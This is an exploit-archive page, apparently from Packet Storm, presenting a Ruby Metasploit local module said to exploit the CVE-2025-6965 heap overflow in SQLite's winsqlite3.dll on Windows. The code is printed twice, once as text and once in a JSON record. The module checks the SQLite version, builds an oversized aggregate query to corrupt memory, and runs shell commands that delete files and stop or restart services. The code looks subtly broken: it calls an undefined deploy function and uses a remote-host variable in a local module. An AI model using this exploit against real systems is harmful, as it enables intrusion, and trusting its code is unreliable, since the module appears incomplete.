📄 SQLite 3.50.1 winsqlite3.dll Heap Overflow_PACKETSTORM:219850

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

This Metasploit local exploit module targets a heap overflow vulnerability in winsqlite3.dll in SQLite versions prior to 3.50.2 on Windows systems. It first attempts to detect the installed SQLite version, then generates a specially crafted database...

Visit Original Source

Basic Information

ID PACKETSTORM:219850

Published Apr 27, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : SQLite 3.50.1 winsqlite3.dll Heap Overflow |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.sqlite.org |
==================================================================================================================================

[+] Summary : This Metasploit local exploit module targets a heap overflow vulnerability in winsqlite3.dll in SQLite versions prior to 3.50.2 on Windows systems.
It first attempts to detect the installed SQLite version,
then generates a specially crafted database and SQL workload containing an excessive number of aggregate functions designed to trigger memory corruption.

[+] POC :

class MetasploitModule < Msf::Exploit::Local
Rank = AverageRanking

include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Services
include Msf::Post::Windows::Registry

def initialize(info = {})
super(
update_info(
info,
'Name' => 'SQLite winsqlite3.dll Heap Overflow (CVE-2025-6965)',
'Description' => %q{
This module exploits a heap overflow vulnerability in SQLite versions prior to 3.50.2.
},
'License' => MSF_LICENSE,
'Author' => ['indoushka'],
'References' => [['CVE', '2025-6965']],
'Platform' => 'win'
)
)

register_options([
OptString.new('DB_PATH', [false, 'Local database path', 'cve_2025_6965_winsqlite3.db']),
OptInt.new('AGGREGATE_COUNT', [true, 'Number of aggregates', 100]),
OptString.new('SERVICE_NAME', [false, 'Target service name', '']),
OptString.new('AD_CACHE_DIR', [false, 'AD cache directory', 'C:\\Temp']),
OptString.new('AD_DB_TARGET', [false, 'Target DB name', 'ad_cache.db']),
OptBool.new('FORCE_SERVICE_RESTART', [false, 'Restart service after exploitation', false])
])
end

def check
print_status("Checking SQLite version...")

sqlite_version = get_sqlite_version

if sqlite_version.nil?
return Exploit::CheckCode::Unknown
end

print_status("SQLite version detected: #{sqlite_version}")

if sqlite_version < Gem::Version.new('3.50.2')
return Exploit::CheckCode::Vulnerable
end

Exploit::CheckCode::Safe
end

def exploit
print_status("Starting exploitation")

check_result = check
if check_result == Exploit::CheckCode::Safe
fail_with(Failure::NotVulnerable, "Target appears patched")
end

db_path = create_malicious_database
fail_with(Failure::UnexpectedReply, "DB creation failed") unless db_path

deploy_to_ad_cache(db_path) || fail_with(Failure::UnexpectedReply, "Deploy failed")

trigger_overflow(datastore['AD_CACHE_DIR'] + "\\" + datastore['AD_DB_TARGET'])

if datastore['FORCE_SERVICE_RESTART']
restart_target_service
end
end

def get_sqlite_version
sqlite_paths = [
"#{ENV['WINDIR']}\\System32\\winsqlite3.dll"
]

sqlite_paths.each do |path|
next unless file_exist?(path)

version = file_version(path)
next unless version

if version =~ /(\d+\.\d+\.\d+)/
return Gem::Version.new($1)
end
end

nil
end

def create_malicious_database
print_status("Creating malicious database...")

db_path = datastore['DB_PATH']

sql_script = "CREATE TABLE IF NOT EXISTS ad_cache (id INTEGER PRIMARY KEY, val INTEGER);"

temp_sql = "#{Dir.tmpdir}/#{Rex::Text.rand_text_alpha(8)}.sql"
write_file(temp_sql, sql_script)

cmd_exec("sqlite3 \"#{db_path}\" < \"#{temp_sql}\"")

rm_f(temp_sql)

file_exist?(db_path) ? db_path : nil
end

def generate_malicious_query(num)
parts = []

num.to_i.times do |i|
parts << "COUNT(*) AS c#{i}"
parts << "SUM(val) AS s#{i}"
parts << "AVG(val) AS a#{i}"
end

"SELECT #{parts.join(', ')} FROM ad_cache"
end

def trigger_overflow(db_path)
print_status("Triggering overflow...")

query = generate_malicious_query(datastore['AGGREGATE_COUNT'])

python = <<~PY
import sqlite3
conn = sqlite3.connect('#{db_path}')
cur = conn.cursor()

try:
cur.execute(\"\"\"#{query}\"\"\")
conn.commit()
except Exception as e:
print("Error:", e)

conn.close()
PY

tmp = "#{Dir.tmpdir}/#{Rex::Text.rand_text_alpha(6)}.py"
write_file(tmp, python)

cmd_exec("python \"#{tmp}\"")

rm_f(tmp)

report_vuln(
host: rhost,
name: "CVE-2025-6965 SQLite Heap Overflow"
)
end

def restart_target_service
service = datastore['SERVICE_NAME']
return if service.nil? || service.empty?

return unless service_exists?(service)

cmd_exec("net stop \"#{service}\"")
Rex.sleep(2)
cmd_exec("net start \"#{service}\"")
end

def service_exists?(name)
result = cmd_exec("sc query \"#{name}\"")
return false if result.nil?
!result.include?("FAILED")
end

def exec_cmd(cmd)
return nil unless session
session.shell_command_token(cmd)
end

alias cmd_exec exec_cmd

def write_file(path, content)
session.fs.file.write(path, content) if session
end

def rm_f(path)
cmd_exec("del /F /Q \"#{path}\"")
end
end

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-04-27T16:32:26",
    "description": "This Metasploit local exploit module targets a heap overflow vulnerability in winsqlite3.dll in SQLite versions prior to 3.50.2 on Windows systems. It first attempts to detect the installed SQLite version, then generates a specially crafted database...",
    "published": "2026-04-27T00:00:00",
    "modified": "2026-04-27T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 SQLite 3.50.1 winsqlite3.dll Heap Overflow",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:219850",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-6965"
    ],
    "sourceData": "==================================================================================================================================\n    | # Title     : SQLite 3.50.1 winsqlite3.dll Heap Overflow                                                                       |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://www.sqlite.org                                                                                           |\n    ==================================================================================================================================\n    \n    [+] Summary    : This Metasploit local exploit module targets a heap overflow vulnerability in winsqlite3.dll in SQLite versions prior to 3.50.2 on Windows systems. \n                     It first attempts to detect the installed SQLite version, \n                     then generates a specially crafted database and SQL workload containing an excessive number of aggregate functions designed to trigger memory corruption.\n    \n    [+] POC        :  \n    \n    class MetasploitModule < Msf::Exploit::Local\n      Rank = AverageRanking\n    \n      include Msf::Post::File\n      include Msf::Post::Windows::Priv\n      include Msf::Post::Windows::Services\n      include Msf::Post::Windows::Registry\n    \n      def initialize(info = {})\n        super(\n          update_info(\n            info,\n            'Name' => 'SQLite winsqlite3.dll Heap Overflow (CVE-2025-6965)',\n            'Description' => %q{\n              This module exploits a heap overflow vulnerability in SQLite versions prior to 3.50.2.\n            },\n            'License' => MSF_LICENSE,\n            'Author' => ['indoushka'],\n            'References' => [['CVE', '2025-6965']],\n            'Platform' => 'win'\n          )\n        )\n    \n        register_options([\n          OptString.new('DB_PATH', [false, 'Local database path', 'cve_2025_6965_winsqlite3.db']),\n          OptInt.new('AGGREGATE_COUNT', [true, 'Number of aggregates', 100]),\n          OptString.new('SERVICE_NAME', [false, 'Target service name', '']),\n          OptString.new('AD_CACHE_DIR', [false, 'AD cache directory', 'C:\\\\Temp']),\n          OptString.new('AD_DB_TARGET', [false, 'Target DB name', 'ad_cache.db']),\n          OptBool.new('FORCE_SERVICE_RESTART', [false, 'Restart service after exploitation', false])\n        ])\n      end\n    \n      def check\n        print_status(\"Checking SQLite version...\")\n    \n        sqlite_version = get_sqlite_version\n    \n        if sqlite_version.nil?\n          return Exploit::CheckCode::Unknown\n        end\n    \n        print_status(\"SQLite version detected: #{sqlite_version}\")\n    \n        if sqlite_version < Gem::Version.new('3.50.2')\n          return Exploit::CheckCode::Vulnerable\n        end\n    \n        Exploit::CheckCode::Safe\n      end\n    \n      def exploit\n        print_status(\"Starting exploitation\")\n    \n        check_result = check\n        if check_result == Exploit::CheckCode::Safe\n          fail_with(Failure::NotVulnerable, \"Target appears patched\")\n        end\n    \n        db_path = create_malicious_database\n        fail_with(Failure::UnexpectedReply, \"DB creation failed\") unless db_path\n    \n        deploy_to_ad_cache(db_path) || fail_with(Failure::UnexpectedReply, \"Deploy failed\")\n    \n        trigger_overflow(datastore['AD_CACHE_DIR'] + \"\\\\\" + datastore['AD_DB_TARGET'])\n    \n        if datastore['FORCE_SERVICE_RESTART']\n          restart_target_service\n        end\n      end\n    \n      def get_sqlite_version\n        sqlite_paths = [\n          \"#{ENV['WINDIR']}\\\\System32\\\\winsqlite3.dll\"\n        ]\n    \n        sqlite_paths.each do |path|\n          next unless file_exist?(path)\n    \n          version = file_version(path)\n          next unless version\n    \n          if version =~ /(\\d+\\.\\d+\\.\\d+)/\n            return Gem::Version.new($1)\n          end\n        end\n    \n        nil\n      end\n    \n      def create_malicious_database\n        print_status(\"Creating malicious database...\")\n    \n        db_path = datastore['DB_PATH']\n    \n        sql_script = \"CREATE TABLE IF NOT EXISTS ad_cache (id INTEGER PRIMARY KEY, val INTEGER);\"\n    \n        temp_sql = \"#{Dir.tmpdir}/#{Rex::Text.rand_text_alpha(8)}.sql\"\n        write_file(temp_sql, sql_script)\n    \n        cmd_exec(\"sqlite3 \\\"#{db_path}\\\" < \\\"#{temp_sql}\\\"\")\n    \n        rm_f(temp_sql)\n    \n        file_exist?(db_path) ? db_path : nil\n      end\n    \n      def generate_malicious_query(num)\n        parts = []\n    \n        num.to_i.times do |i|\n          parts << \"COUNT(*) AS c#{i}\"\n          parts << \"SUM(val) AS s#{i}\"\n          parts << \"AVG(val) AS a#{i}\"\n        end\n    \n        \"SELECT #{parts.join(', ')} FROM ad_cache\"\n      end\n    \n      def trigger_overflow(db_path)\n        print_status(\"Triggering overflow...\")\n    \n        query = generate_malicious_query(datastore['AGGREGATE_COUNT'])\n    \n        python = <<~PY\n          import sqlite3\n          conn = sqlite3.connect('#{db_path}')\n          cur = conn.cursor()\n    \n          try:\n              cur.execute(\\\"\\\"\\\"#{query}\\\"\\\"\\\")\n              conn.commit()\n          except Exception as e:\n              print(\"Error:\", e)\n    \n          conn.close()\n        PY\n    \n        tmp = \"#{Dir.tmpdir}/#{Rex::Text.rand_text_alpha(6)}.py\"\n        write_file(tmp, python)\n    \n        cmd_exec(\"python \\\"#{tmp}\\\"\")\n    \n        rm_f(tmp)\n    \n        report_vuln(\n          host: rhost,\n          name: \"CVE-2025-6965 SQLite Heap Overflow\"\n        )\n      end\n    \n      def restart_target_service\n        service = datastore['SERVICE_NAME']\n        return if service.nil? || service.empty?\n    \n        return unless service_exists?(service)\n    \n        cmd_exec(\"net stop \\\"#{service}\\\"\")\n        Rex.sleep(2)\n        cmd_exec(\"net start \\\"#{service}\\\"\")\n      end\n    \n      def service_exists?(name)\n        result = cmd_exec(\"sc query \\\"#{name}\\\"\")\n        return false if result.nil?\n        !result.include?(\"FAILED\")\n      end\n    \n      def exec_cmd(cmd)\n        return nil unless session\n        session.shell_command_token(cmd)\n      end\n    \n      alias cmd_exec exec_cmd\n    \n      def write_file(path, content)\n        session.fs.file.write(path, content) if session\n      end\n    \n      def rm_f(path)\n        cmd_exec(\"del /F /Q \\\"#{path}\\\"\")\n      end\n    end\n    \t\n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/219850",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/219850/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply